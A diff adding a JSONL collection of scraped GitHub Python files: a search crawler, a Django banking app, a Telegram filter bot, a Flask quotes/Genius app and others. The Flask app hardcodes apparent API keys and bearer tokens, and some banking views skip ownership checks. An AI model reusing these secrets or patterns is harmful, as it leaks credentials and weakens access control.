diff --git "a/5310.jsonl" "b/5310.jsonl" new file mode 100644--- /dev/null +++ "b/5310.jsonl" @@ -0,0 +1,1350 @@ +{"seq_id":"34100461318","text":"from threading import Thread\nimport math\n\nfrom . import Search\nfrom .db import get_collection\nfrom tqdm import tqdm\n\nresult_name = 'results'\nerror_list_name = 'errors'\n\nclass Period(object):\n def __init__(self, from_year, from_month, to_year, to_month):\n self.from_year = from_year\n self.from_month = from_month\n self.to_year = to_year\n self.to_month = to_month\n\n def to_json(self):\n return {'from_year': self.from_year,\n 'from_month': self.from_month,\n 'to_year': self.to_year,\n 'to_month': self.to_month}\n\n def get_str_from(self):\n return \"{}.{}\".format(self.from_year, self.from_month)\n\n def get_str_to(self):\n return \"{}.{}\".format(self.to_year, self.to_month)\n\nclass Result(object):\n def __init__(self, keywords, period:Period, result):\n self.keywords = keywords['keywords']\n self.id = keywords['id']\n self.period = period\n self.result = result\n\n def to_json(self):\n return {\n 'keywords_id': self.id,\n 'keywords': self.keywords,\n 'from_year': self.period.from_year,\n 'from_month': self.period.from_month,\n 'to_year': self.period.to_year,\n 'to_month': self.period.to_month,\n 'result': self.result\n }\n\nclass Run(object):\n def __init__(self, input_file_name, input_path, output_path, from_year, to_year):\n self.db_name = input_file_name\n self.input_path = input_path\n self.output_path = output_path\n self.keywords_list = []\n self.from_year = from_year\n self.to_year = to_year\n self.search = Search()\n self._load_input()\n\n def _load_input(self):\n with open(self.input_path, 'r') as file:\n while True:\n line = file.readline()\n if line:\n words = line.split(\",\")\n keywords = []\n keywords_id = words[0]\n if keywords_id == \"\":\n continue\n for i in range(1, len(words)):\n word = words[i].strip()\n if word == \"\" or len(word) == 0 or word == '':\n pass\n else:\n keywords.append(word)\n keywords = sorted([word.strip() for word in keywords])\n self.keywords_list.append({'id': keywords_id, 'keywords':keywords})\n else:\n break\n\n def _search(self, keywords, period:Period):\n try:\n result = self.search.search(keywords['keywords'], period.get_str_from(), period.get_str_to())\n print(\"Search Success : {}-{} = {},{}\".format(period.get_str_from(), period.get_str_to(), str(result),\n keywords['id']))\n return result\n except:\n print(\"Error ! : {}-{} = {}\".format(period.get_str_from(), period.get_str_to(), keywords['id']))\n get_collection(db_name=self.db_name, collection_name=error_list_name).insert_one(\n {\"id\": keywords['id'],\n \"keywords\": keywords['keywords'],\n \"from_year\": period.from_year,\n \"from_month\":period.from_month,\n \"to_year\": period.to_year,\n \"to_month\": period.to_month})\n return None\n\n def _periodic_search(self, keywords, period_list:list):\n for period in period_list:\n result = self._search(keywords, period)\n if result is not None:\n result = Result(keywords, period, result)\n get_collection(db_name= self.db_name, collection_name=result_name).insert_one(result.to_json())\n else:\n pass\n\n def _yearly_search(self, keywords, year:int):\n period = Period(year, 1, year, 12)\n result = self._search(keywords, period)\n if result is not None:\n if result < 3000:\n result = Result(keywords, period, result)\n get_collection(db_name=self.db_name, collection_name=result_name).insert_one(result.to_json())\n else:\n period_list = []\n for i in range(6):\n period_list.append(Period(year, i * 2 + 1, year, i * 2 + 2))\n self._periodic_search(keywords, period_list)\n\n def _get_result(self, keywords_list):\n print(\"Search start ! \")\n pbar = tqdm(total=(self.to_year - self.from_year + 1) * len(keywords_list))\n for keywords in keywords_list:\n for year in range(self.from_year, self.to_year+1):\n self._yearly_search(keywords, year)\n pbar.update(1)\n\n def _divide_keywords_list(self, thread_count):\n keywords_list = []\n max_keywords_len = int(math.ceil(len(self.keywords_list) / thread_count))\n count = 0\n for i in range(max_keywords_len):\n for j in range(thread_count):\n if len(keywords_list) <= j:\n keywords_list.append([])\n if count < len(self.keywords_list):\n keywords_list[j].append(self.keywords_list[count])\n # TODO Send self.keywords_list[count] to DB\n count += 1\n else:\n break\n\n return keywords_list\n\n def _make_report(self):\n file = open(self.output_path, 'w')\n print(\"Make Report !\")\n pbar = tqdm(total = len(self.keywords_list) * (self.to_year - self.from_year + 1))\n result_collection = get_collection(db_name=self.db_name, collection_name=result_name)\n for keywords in self.keywords_list:\n keywords_id = keywords[\"id\"]\n for year in range(self.from_year, self.to_year+1):\n result_count = result_collection.count({\"keywords_id\": keywords_id, \"from_year\": year})\n if result_count == 0:\n print(\"lack of result - search again : {}-{}\".format(year, keywords_id))\n self._yearly_search(keywords, year)\n count = 0\n while True:\n count = 0\n finished = True\n year_count_one = False\n yearly_results = result_collection.find({\"keywords_id\": keywords_id, \"from_year\": year})\n already_checked = []\n for result in yearly_results:\n from_month = result['from_month']\n to_month = result['to_month']\n\n if from_month in already_checked:\n print(\"double result - {}.{} : {}\".format(year, from_month, keywords_id))\n continue\n if from_month == 1 and to_month == 12:\n year_count_one = True\n count = result[\"result\"]\n break\n else:\n count += result[\"result\"]\n already_checked.append(from_month)\n if not year_count_one:\n period_list = []\n for i in range(6):\n month = i * 2 + 1\n if month not in already_checked:\n print(\"Unfinished period occur\")\n finished = False\n period = Period(year, month, year, month+1)\n period_list.append(period)\n if not finished:\n self._periodic_search(keywords, period_list)\n else:\n break\n else:\n break\n file.write(\",\".join([keywords_id, str(year), str(count)]) + \"\\n\")\n file.flush()\n pbar.update(1)\n\n def _resolve_errors(self):\n while True:\n collection = get_collection(db_name=self.db_name, collection_name=error_list_name)\n error_count = collection.count()\n if error_count > 0:\n print(\"Last Error Count : {} - RETRY!!!\".format(error_count))\n\n errors = collection.find()\n count = 0\n pbar = tqdm(total=error_count)\n while True:\n if count >= error_count:\n break\n error = next(errors)\n collection.delete_one(error)\n count += 1\n from_year = error['from_year']\n from_month = error['from_month']\n to_year = error['to_year']\n to_month = error['to_month']\n keywords = {'id': error['id'], 'keywords': error['keywords']}\n if from_month == 1 and to_month == 12:\n self._yearly_search(keywords, from_year)\n else:\n period = Period(from_year, from_month, to_year, to_month)\n self._periodic_search(keywords, [period])\n pbar.update(1)\n else:\n break\n\n\n def run(self, thread_count=1):\n thread_list = []\n # keywords_list = self._divide_keywords_list(thread_count)\n\n print(\"Crawling start!\")\n #self._get_result(keywords_list[0])\n self._resolve_errors()\n self._make_report()\n","repo_name":"maybedy/lna_crawler","sub_path":"lna_crawler/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29879880902","text":"# Fangyuan Wan\n# Draw a cube\n\nclass Characters:\n \"\"\"\n Create a class to store the symbols\n \"\"\"\n PLUS = \"+\"\n HORIZONTAL = \"-\"\n VERTICAL = \"|\"\n DIAGONAL = \"/\"\n SPACE = \" \"\n\n\nclass DrawCube:\n \"\"\"\n Manage the prompting and drawing of the cube.\n \"\"\"\n\n def __init__(self):\n self.cube_size: int | None = None\n\n def get_cube_size(self):\n TWO = 2\n self.cube_size: int = int(input(\"Input cube size (multiple of 2): \"))\n while self.cube_size % TWO != 0:\n self.cube_size = int(\n input(\"PLEASE Input cube size (multiple of 2): \"))\n\n def draw_corner_and_horizontal(self):\n TWO = 2\n horizontal_characters: int = self.cube_size * TWO\n return (Characters.PLUS +\n Characters.HORIZONTAL * horizontal_characters +\n Characters.PLUS)\n\n def top_half_cube(self):\n TWO = 2\n ONE = 1\n height = int(self.cube_size / TWO + TWO)\n left_white_spaces: int = int(self.cube_size / TWO + ONE)\n mid_white_spaces: int = int(self.cube_size * TWO)\n first_line: int = 0\n for line in range(height):\n if line == first_line:\n print(Characters.SPACE * (left_white_spaces - line) +\n self.draw_corner_and_horizontal())\n elif line == height - ONE:\n print(Characters.SPACE * (left_white_spaces - line) +\n self.draw_corner_and_horizontal() +\n Characters.SPACE * (line - ONE) +\n Characters.VERTICAL)\n else:\n print(Characters.SPACE * (left_white_spaces - line) +\n Characters.DIAGONAL +\n Characters.SPACE * mid_white_spaces +\n Characters.DIAGONAL +\n Characters.SPACE * (line - ONE) +\n Characters.VERTICAL)\n\n def bottom_half(self):\n \"\"\"\n Draw the bottom half of the cube.\n \"\"\"\n ONE = 1\n TWO = 2\n height: int = self.cube_size + ONE\n mid_white_spaces: int = self.cube_size * TWO\n right_white_spaces: int = int(self.cube_size / TWO)\n for line in range(height):\n if line == self.cube_size / TWO - ONE:\n print(Characters.VERTICAL +\n Characters.SPACE * mid_white_spaces +\n Characters.VERTICAL +\n Characters.SPACE * right_white_spaces +\n Characters.PLUS)\n elif line < self.cube_size / TWO - ONE:\n print(Characters.VERTICAL +\n Characters.SPACE * mid_white_spaces +\n Characters.VERTICAL +\n Characters.SPACE * right_white_spaces +\n Characters.VERTICAL)\n elif self.cube_size / TWO <= line < self.cube_size:\n print(Characters.VERTICAL +\n Characters.SPACE * mid_white_spaces +\n Characters.VERTICAL +\n Characters.SPACE *\n (self.cube_size - line - ONE) +\n Characters.DIAGONAL)\n elif line == self.cube_size:\n print(self.draw_corner_and_horizontal())\n\n def draw_cube(self):\n \"\"\"\n Call the three functions above to draw the cube.\n \"\"\"\n self.get_cube_size()\n self.top_half_cube()\n self.bottom_half()\n\n\ndef main():\n \"\"\"\n Draw the cube\n \"\"\"\n draw_cube = DrawCube()\n draw_cube.draw_cube()\n\n\nmain()\n","repo_name":"Jane-FangyuanWan/python_projects","sub_path":"hw06/print_cube.py","file_name":"print_cube.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17023324494","text":"import sys\nfrom random import seed, randint\nimport random\n\n\ndef cmdlinearg(name, default=None):\n for arg in sys.argv:\n if arg.startswith(name + \"=\"):\n return arg.split(\"=\")[1]\n assert default is not None, name\n return default\n\n\nseed(int(cmdlinearg('seed', sys.argv[-1])))\nN = int(cmdlinearg('N'))\nsingle = int(cmdlinearg('single', -1))\n\nif N == 1:\n print(N)\n print(single)\n\nelse:\n houses = set()\n while len(houses) < N:\n houses.add(random.randint(2, 12))\n\n print(N)\n print(\" \".join(map(str, sorted(houses))))\n","repo_name":"Kodsport/doris-2023","sub_path":"doris-2/monopol2/data/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16957747676","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.views.generic import View\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom datetime import datetime\n\nfrom .models import Account, AccountType, Transaction, TransactionType, Bill\n\n\n\n\ndef index(request):\n return redirect(reverse('app:accounts'))\n\n\n@login_required()\ndef account_detail(request, account_id):\n account = get_object_or_404(Account, id=account_id)\n context = {\n 'user': request.user,\n 'account': account,\n 'interest_percent': account.account_type.interest_rate * 100,\n 'transactions': account.transactions.all().order_by('-created_at')\n }\n return render(request, 'account_details.html', context)\n\n\nclass Main(object):\n template = None\n\n def get(self, request):\n context = {\n 'user': request.user,\n 'accounts': request.user.accounts.all()\n }\n return render(request, self.get_template(), context)\n\n def get_template(self):\n if self.template is not None:\n return self.template\n raise ImproperlyConfigured('Template not defined.')\n\n\nclass AccountsView(LoginRequiredMixin, Main, View):\n template = 'dashboard.html'\n\n def get(self, request):\n basic_total = 0\n credit_total = 0\n loan_total = 0\n for account in request.user.accounts.all():\n if account.account_type.name == \"Credit\":\n credit_total += account.balance\n elif account.account_type.name == \"Loan\":\n loan_total += account.balance\n else:\n basic_total += account.balance\n context = {\n 'user': request.user,\n 'accounts': request.user.accounts.all(),\n 'basic_total': basic_total,\n 'credit_total': credit_total,\n 'loan_total': loan_total\n }\n return render(request, self.get_template(), context)\n\n def post(self, request):\n user = request.user\n created_account = Account.objects.create_account(\n owner=user,\n account_type=AccountType.objects.get(name=request.POST['account_name']),\n balance=0\n )\n\n account_type = created_account.account_type\n messages.success(request, 'You have successfully created a new '+account_type.name+' account! You can now transfer funds!')\n return redirect('/accounts/'+str(created_account.id))\n # return redirect(reverse('app:accounts'))\n\n\nclass PurchaseView(LoginRequiredMixin, Main, View):\n template = 'purchase.html'\n \n def get(self, request):\n context = {\n 'date': datetime.now().date()\n }\n return render(request, self.get_template(), context)\n\n def post(self, request):\n errors = Transaction.objects.validate_purchase(request.POST)\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n return redirect(reverse('app:purchase'))\n\n selected_account = Account.objects.get(id=request.POST['account_id'])\n new_balance = selected_account.balance - float(request.POST['amount'])\n\n selected_account.balance = new_balance\n selected_account.save()\n\n Transaction.objects.create(\n desc = request.POST['desc'],\n amount = float(request.POST['amount']),\n new_balance = new_balance,\n is_deposit = False,\n process_date = datetime.now().date(),\n account = selected_account,\n transaction_type = TransactionType.objects.get(name=\"Purchase\")\n )\n\n messages.success(request, \"You have successfully added a new purchase!\")\n return redirect('/accounts/'+str(selected_account.id))\n\n\nclass TransferView(LoginRequiredMixin, Main, View):\n template = 'transfer.html'\n\n def post(self, request):\n errors = Transaction.objects.validate_transfer(request.POST)\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n return redirect(reverse('app:transfer'))\n\n sending_account = Account.objects.get(id=request.POST['account_id'])\n receiving_account = Account.objects.get(id=request.POST['to_account_id'])\n\n # Updating account balances\n new_balance = sending_account.balance - float(request.POST['amount'])\n receiving_new_balance = receiving_account.balance + float(request.POST['amount'])\n\n sending_account.balance = new_balance\n sending_account.save()\n\n receiving_account.balance = receiving_new_balance\n receiving_account.save()\n\n # Withdrawal Transaction\n Transaction.objects.create(\n desc = \"Transfer to \"+receiving_account.account_number,\n amount = float(request.POST['amount']),\n new_balance = new_balance,\n is_deposit = False,\n process_date = datetime.now().date(),\n account = sending_account,\n transaction_type = TransactionType.objects.get(name=\"Transfer\")\n )\n # Deposit Transaction\n Transaction.objects.create(\n desc = \"Transfer from \"+sending_account.account_number,\n amount = float(request.POST['amount']),\n new_balance = receiving_new_balance,\n is_deposit = True,\n process_date = datetime.now().date(),\n account = receiving_account,\n transaction_type = TransactionType.objects.get(name=\"Transfer\")\n )\n\n messages.success(request, \"You have successfully transfered funds from $\"+str(float(request.POST['amount']))+\" \"+sending_account.account_number+\" to \"+receiving_account.account_number)\n return redirect(reverse('app:transfer'))\n\n\nclass BillView(LoginRequiredMixin, Main, View):\n template = 'bill.html'\n\n def post(self, request):\n errors = Bill.objects.validate_bill(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(reverse('app:bill'))\n else:\n from_account = Account.objects.get(id=request.POST['from_account'])\n name = request.POST['name']\n bill_account_number = request.POST['bill_account_number']\n payment = request.POST['payment']\n date = datetime.now()\n owner = request.user\n bill = Bill.objects.create(\n bill_account_number = bill_account_number,\n name = name,\n payment = payment,\n date = date,\n from_account = from_account,\n owner = owner\n )\n return redirect(reverse('app:accounts'))\n\n\nclass ContactsView(LoginRequiredMixin, Main, View):\n template = 'transfer_contacts.html'\n\n def post(self, request):\n errors = Account.objects.validate_contact(\n request.POST,\n request.user.id\n )\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n else:\n account = get_object_or_404(\n Account,\n account_number=request.POST['account_number']\n )\n request.user.linked_accounts.add(account)\n return redirect(reverse('app:contacts'))\n\n\nclass ExternalTransferView(LoginRequiredMixin, Main, View):\n template = 'ext_transfer.html'\n\n def get(self, request, account_id):\n context = {\n 'user': request.user,\n 'accounts': request.user.accounts.all(),\n 'contact': get_object_or_404(Account, id=account_id),\n 'today': datetime.now().strftime('%Y-%m-%d')\n }\n return render(request, self.get_template(), context)\n\n def post(self, request, account_id):\n errors = Transaction.objects.validate_extransfer(request.POST)\n if len(errors) > 0:\n for key, error in errors.items():\n messages.error(request, error)\n return redirect(\n reverse('app:external_transfer', args=(account_id,))\n )\n\n to_acct = get_object_or_404(Account, id=account_id)\n from_acct = get_object_or_404(Account, id=request.POST['account'])\n trans_amount = float(request.POST['amount'])\n Transaction.objects.create(\n desc=request.POST['desc'],\n amount=trans_amount,\n new_balance=from_acct.balance - trans_amount,\n is_deposit=False,\n process_date=request.POST['date'],\n account=from_acct,\n transaction_type=TransactionType.objects.get(id=1),\n )\n Transaction.objects.create(\n desc=request.POST['desc'],\n amount=trans_amount,\n new_balance=to_acct.balance + trans_amount,\n is_deposit=True,\n process_date=request.POST['date'],\n account=to_acct,\n transaction_type=TransactionType.objects.get(id=1),\n )\n from_acct.balance -= trans_amount\n to_acct.balance += trans_amount\n from_acct.save()\n to_acct.save()\n messages.success(request, 'External transfer successfully processed')\n return redirect(reverse('app:accounts_detail', args=(from_acct.id,)))\n\n\nclass ATMView(LoginRequiredMixin, Main, View):\n template = 'atm.html'\n\n def post(self, request):\n errors = Transaction.objects.validate_atm(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(reverse('app:atm'))\n else:\n account = get_object_or_404(Account, id=request.POST['account'])\n desc = request.POST['description']\n amount = request.POST['amount']\n if request.POST['type'] == \"Withdrawal\":\n new_balance = account.balance - float(request.POST['amount'])\n is_deposit = False\n elif request.POST['type'] == \"Deposit\":\n new_balance = account.balance + float(request.POST['amount'])\n is_deposit = True\n process_date = datetime.now()\n transaction_type = TransactionType.objects.get(name=\"ATM\")\n transaction = Transaction.objects.create(\n desc = desc,\n amount = amount,\n new_balance = new_balance,\n is_deposit = is_deposit,\n process_date = process_date,\n account = account,\n transaction_type = transaction_type\n )\n account.balance = new_balance\n account.save()\n return redirect(reverse('app:accounts'))\n\n@login_required()\ndef create_account(request):\n if request.method == 'GET':\n context = {\n 'account_types': AccountType.objects.all()\n }\n return render(request, 'create_account.html', context)\n\n@login_required()\ndef pay_bill(request, bill_id):\n bill = get_object_or_404(Bill, id=bill_id)\n account = get_object_or_404(Account, id=bill.from_account.id)\n transaction = Transaction.objects.create(\n desc = bill.name,\n amount = bill.payment,\n new_balance = account.balance - bill.payment,\n is_deposit = False,\n process_date = datetime.now(),\n account = account,\n transaction_type = TransactionType.objects.get(id=1)\n )\n account.balance -= bill.payment\n account.save()\n messages.success(request, 'Bill Successfully Paid')\n return redirect(reverse('app:accounts'))\n\n@login_required()\ndef delete_bill(request, bill_id):\n bill = get_object_or_404(Bill, id=bill_id)\n bill.delete()\n return redirect(reverse('app:accounts'))\n\n","repo_name":"jtclayt/bank_app","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20503183729","text":"from Person import Person\nfrom flask import Flask\n\n\ndef main():\n p1 = Person(\"John\", 36)\n p1.myfunc()\n dic = {}\n dic[1] = \"Pear\"\n print(dic[1])\n\n\nprint(\"This is a test\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"henkelmeister/pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24093871138","text":"import pandas as pd\nimport numpy as np\n\npd.set_option('mode.chained_assignment', None)\n\n\n## Function for values that are manually imputed\n## THIS IS A CURRIED FUNCTION\ndef impute_shell(qualPow):\n def imputeVals(in_df):\n df = in_df.copy()\n df[\"scaledOverallQual\"] = df.OverallQual.apply(\n lambda x: x**qualPow)\n \n toInt = ['ExterQual', 'ExterCond', 'BsmtQual', 'BsmtCond', 'HeatingQC',\n 'KitchenQual', 'FireplaceQu', 'GarageQual', 'GarageCond', 'PoolQC']\n intDict = {\"Ex\": 5, \"Gd\": 4, \"TA\": 3, \"Fa\": 2, \"Po\": 1}\n for i in toInt:\n df[i] = df[i].apply(lambda x: intDict.get(x, 0))\n\n df[\"SF\"] = df.TotalBsmtSF + df[\"1stFlrSF\"] + df[\"2ndFlrSF\"]\n df[\"numBaths\"] = df.BsmtFullBath + 0.5 * \\\n df.BsmtHalfBath + df.FullBath + 0.5*df.HalfBath\n df[\"bsmtBaths\"] = df.BsmtFullBath + 0.5*df.BsmtHalfBath\n\n return df\n\n return imputeVals\n\n##########################################################################################################\n\n\n####################################################################################################\n############### THIS IS WHERE YOU SELECT WHICH FEATURES ARE INCLUDED IN THE MODEL ##################\nselected = []\n# values that null is filled with \"None\" then get one-hot encoded\nfillNone = [\"GarageFinish\",\"Neighborhood\"]\n \n# Categorical variables represented as integers\ncat_to_int = ['ExterQual', 'BsmtQual', 'GarageQual']\n\n# ordinal categorical variables\nfillZeroCat = []\n\n# continuous variables with missing values that are zero\nfillZeroCont = [\"MasVnrArea\", \"GarageArea\", \"GrLivArea\", \"TotalBsmtSF\", \n \"scaledOverallQual\", \"SF\",\"numBaths\",\"TotRmsAbvGrd\",]\n\nimputeDict = {\"Electrical\": \"Oth\",\n \"Functional\": \"Typ\",\n \"CentralAir\": True,\n \"Exterior1st\": \"VinylSd\",\n \"Exterior2nd\": \"VinylSd\",\n \"SaleType\": \"WD\",\n \"MSZoning\": \"RL\"}\n\n","repo_name":"AJB0211/AmesHousingRegression","sub_path":"modelClasses/meta_features.py","file_name":"meta_features.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72800663492","text":"import os\nimport alm\n\nimport pandas as pd\n\nos.makedirs('./experiments_results/summary', exist_ok=True)\ndata = ['sat', 'u2', 'u4', 'google', 'bats']\n\n\nline_table = []\nfor i in data:\n table = {'data': i}\n val, test = alm.data_analogy.get_dataset_raw(i)\n table['size (validation|test)'] = '{}|{}'.format(len(val), len(test))\n table['candidate number'] = ','.join(list(set([str(len(i['choice'])) for i in test]\n + [str(len(i['choice'])) for i in val])))\n if i == 'sat':\n table['category number'] = 2\n else:\n table['category number'] = len(list(set([i['prefix'] for i in test] + [i['prefix'] for i in val])))\n table['random expectation (test)'] = sum([1/len(i['choice']) for i in test])/len(test) * 100\n line_table.append(table)\n\nprint(pd.DataFrame(line_table))\npd.DataFrame(line_table).to_csv('experiments_results/summary/data.csv')\n\n\n","repo_name":"asahi417/analogy-language-model","sub_path":"experiments/data_statistics.py","file_name":"data_statistics.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"35459034879","text":"# MIT License\r\n\r\n# Copyright (c) 2022 Muhammed\r\n\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n# Telegram Link : https://telegram.dog/Mo_Tech_Group\r\n# Repo Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot\r\n# License Link : https://github.com/PR0FESS0R-99/LuciferMoringstar-Robot/blob/LuciferMoringstar-Robot/LICENSE\r\n\r\nimport re, random\r\nfrom pyrogram import Client, filters\r\nfrom pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton, CallbackQuery\r\nfrom NEOAutofilter import temp, PICS, REQUEST_MOVIE, SINGLE_BUTTON, MOVIE_TEXT\r\nfrom NEOAutofilter.functions import get_size, split_list\r\nfrom database.autofilter_mdb import get_filter_results\r\n\r\nasync def pm_filters(client, update):\r\n if re.findall(\"((^\\/|^,|^!|^\\.|^[\\U0001F600-\\U000E007F]).*)\", update.text):\r\n return\r\n if 2 < len(update.text) < 100: \r\n btn = []\r\n search = update.text\r\n\r\n files = await get_filter_results(query=search)\r\n if files:\r\n for file in files:\r\n file_id = file.file_id\r\n filesize = f\"[{get_size(file.file_size)}]\"\r\n filename = f\"{file.file_name}\"\r\n if SINGLE_BUTTON:\r\n btn.append(\r\n [InlineKeyboardButton(text=f\"{filename}\", callback_data=f\"luciferPM#{file_id}\")]\r\n )\r\n else:\r\n btn.append(\r\n [InlineKeyboardButton(text=f\"{filesize}\", callback_data=f\"luciferPM#{file_id}\"),\r\n InlineKeyboardButton(text=f\"{filename}\", callback_data=f\"luciferPM#{file_id}\")]\r\n )\r\n else:\r\n await client.send_sticker(chat_id=update.from_user.id, sticker='CAADBQADMwIAAtbcmFelnLaGAZhgBwI')\r\n return\r\n\r\n if not btn:\r\n return\r\n\r\n if len(btn) > temp.filterBtns: \r\n btns = list(split_list(btn, temp.filterBtns)) \r\n keyword = f\"{update.chat.id}-{update.id}\"\r\n temp.BUTTONS[keyword] = {\r\n \"total\" : len(btns),\r\n \"buttons\" : btns\r\n }\r\n else:\r\n buttons = btn\r\n buttons.append(\r\n [InlineKeyboardButton(text=\"📃 Pages 1/1\",callback_data=\"pages\"),\r\n InlineKeyboardButton(\"Close 🗑️\", callback_data=\"close\")]\r\n )\r\n\r\n\r\n if REQUEST_MOVIE:\r\n await client.send_photo(chat_id=update.chat.id, photo=random.choice(PICS), caption=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n else:\r\n await client.send_message(chat_id=update.chat.id, text=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n\r\n return\r\n\r\n data = temp.BUTTONS[keyword]\r\n buttons = data['buttons'][0].copy()\r\n \r\n buttons.append(\r\n [InlineKeyboardButton(text=f\"📃 1/{data['total']}\",callback_data=\"pages\"),\r\n InlineKeyboardButton(\"🗑️\", callback_data=\"close\"),\r\n InlineKeyboardButton(text=\"➡\",callback_data=f\"nextbot_0_{keyword}\")]\r\n )\r\n \r\n if REQUEST_MOVIE:\r\n await client.send_photo(chat_id=update.chat.id, photo=random.choice(PICS), caption=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n else:\r\n await client.send_message(chat_id=update.chat.id, text=MOVIE_TEXT.format(mention=update.from_user.mention, query=search, greeting=None, group_name = f\"[{update.chat.title}](t.me/{update.chat.username})\" or f\"[{update.chat.title}](t.me/{update.from_user.username})\"), reply_markup=InlineKeyboardMarkup(buttons))\r\n","repo_name":"BugNeo/NEOAutofilter","sub_path":"NEOAutofilter/modules/autofilterPM.py","file_name":"autofilterPM.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73988906371","text":"import flask\nimport os\nimport requests\nimport json\nimport random\n\napp = flask.Flask(__name__)\napp.static_folder = 'static'\n\n@app.route('/')\ndef artist_info(): \n # return flask.render_template(\"index.html\", test =\"hello from template\")\n url_2 = \"https://quotes15.p.rapidapi.com/quotes/random/\"\n headers = {\n 'x-rapidapi-key': \"4d9b84ebc6mshed63a9b2ac6528dp10f43ajsn35c31f287d81\",\n 'x-rapidapi-host': \"quotes15.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url_2, headers=headers)\n data = json.loads(response.text)\n\n quotes = (data[\"content\"])\n url = \"https://api.genius.com/search?q=Pharrell%20Williams\"\n # genius_key = os.getenv(\"GeniusKey\")\n genius_key = \"t6wt_hu0VvrNOvL6JBhWJAnu7cpB_3cnk6xYegOFWS3dg46qM6Z0MIdu81iq_oOR\"\n my_headers = {\n \"Authorization\": \"Bearer \" + genius_key\n }\n response = requests.get(url, headers=my_headers)\n json_body = response.json() \n \n array = json_body[\"response\"][\"hits\"]\n r = random.randint(0, len(array) - 1) \n \n #This gets the id of the song that's playing\n song_id = array[r][\"result\"][\"id\"]\n\n\n\n song_link = get_songPlaying(song_id)\n return flask.render_template(\"index.html\", quote = quotes, video = song_link)\n\ndef get_songPlaying(song_id):\n song_id_url= \"https://api.genius.com/songs/\" + str(song_id)\n song_id_genius_key = \"sZD99vUmHfcsYnAwtmTIBWsDgTJZjO8qAdzKk5JgGxeMdM4gsktvql3il_0kw0-D\"\n # song_id_genius_key = os.getenv(\"SongIDKey\")\n song_id_headers = {\n \"Authorization\": \"Bearer \" + song_id_genius_key\n }\n response2 = requests.get(song_id_url, headers=song_id_headers)\n json_body2 = response2.json()\n \n \n song_link = json_body2[\"response\"][\"song\"][\"apple_music_player_url\"]\n return song_link\n\n# @app.route('/next')\n# def quotes():\n \n\n\napp.run(\n port=int(os.getenv('PORT', 8080)),\n host=os.getenv('IP', '0.0.0.0'),\n debug=True\n)","repo_name":"ebunnn/SOS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72288830532","text":"class Solution(object):\n def 